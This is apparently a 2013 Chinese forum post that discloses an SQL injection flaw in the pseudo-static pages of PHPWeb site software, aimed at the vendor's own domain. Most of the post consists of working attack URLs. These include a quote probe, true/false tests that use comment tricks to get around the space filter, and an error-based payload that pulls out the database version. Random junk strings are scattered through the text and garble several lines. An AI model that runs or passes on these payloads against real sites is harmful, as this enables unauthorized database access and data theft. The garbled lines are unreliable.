phpweb所有的整站程序伪静态页面都存在sql注入# H; y& R$ I) ~- z% c; F
) i9 k( @8 x1 x" a8 A9 L3 k# ]' B主站:http://phpweb.net/. c. n) D4 G S3 f8 ]8 `
加’检测:4 K9 u, t% }3 Q$ y; S9 B
- R- H/ m- z9 {! i$ ~
http://www.phpweb.net/down/html/?772′.html
l4 z6 Q" I( z4 F6 N3 H% _% K
0 g" h' k$ d7 ?. }! m: I* O E出错) ?/ s" B5 C$ d
存在注入。
# U+ U+ b% H% f8 m9 `! E0 Z不能用空格,只能用/*罗
9 u! s+ f& U& V( `http://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常9 K% D: L7 ]" _$ G" W0 b1 m% _; V7 \! o' ]
7 x( T \' q, _ {% G7 Z& `$ d
http://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错.
& B- ^5 {) ]6 ]9 K8 k; S3 a爆数据库版本:2 E% k0 [, r9 S, V) r- r
" o5 P2 b2 k2 I1 K
?
1 D6 d7 a6 D% s+ d7 ~- u. @1* i4 h+ P, X( `% ~' T
http://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html! ]3 N" |* c6 E
更新日期: 2013-01-03 13:39:50
t& J1 l# V4 a, c& F |
发表于 2013-1-4 19:46:42
收藏
支持
反对